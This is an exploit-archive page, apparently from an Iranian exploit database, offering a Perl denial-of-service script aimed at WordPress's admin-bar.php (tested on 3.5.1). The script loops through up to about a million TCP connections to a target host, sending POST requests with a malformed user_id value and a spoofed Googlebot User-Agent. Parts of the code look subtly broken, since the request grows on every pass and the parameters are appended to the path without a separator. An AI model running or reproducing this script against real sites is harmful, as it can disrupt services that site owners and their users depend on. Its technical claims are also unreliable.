Wordpress admin-bar Page Denial of Service

2013-10-03 15:19:25
Posted by: irist.ir

#################################
#!/usr/bin/perl
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
# Iranian Exploit DataBase
# Wordpress admin-bar Page Denial of Service
# Test : 3.5.1
# Code : Written By Amir
# Home : http://Www.IeDb.Ir - http://Www.IeDb.Ir/acc
# Greats : All Members In IeDb.Ir/acc
# Exploit Archive : http://www.iedb.ir/exploits-655.html
#####################################

use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if(!$ARGV[1])
{
print "################################################# \n";
print "## Wordpress admin-bar Page Denial of Service\n";
print "## Discoverd By Amir \n";
print "## Www.IeDb.Ir - Www.IeDb.Ir/acc \n";
print "################################################# \n";
print "## [host] [wp-includes] \n";
print "## host.com /wp-includes/\n";
print "################################################# \n";
exit();
}
for($i=100; $i<999999; $i++)
{
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Time Out.\n");
$post = "user_id=%0%0%0%0%0%0%0";
$pack.= "POST " .$path. "admin-bar.php".$post." HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Accept-Encoding: gzip, deflate\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Connection: Keep-Alive\r\n";
$pack.= "Cache-Control: no-cache\r\n\r\n";
print $socket $pack;
syswrite STDOUT, "+";
}

Fixes

No fixes

In order to submit a new fix you need to be registered.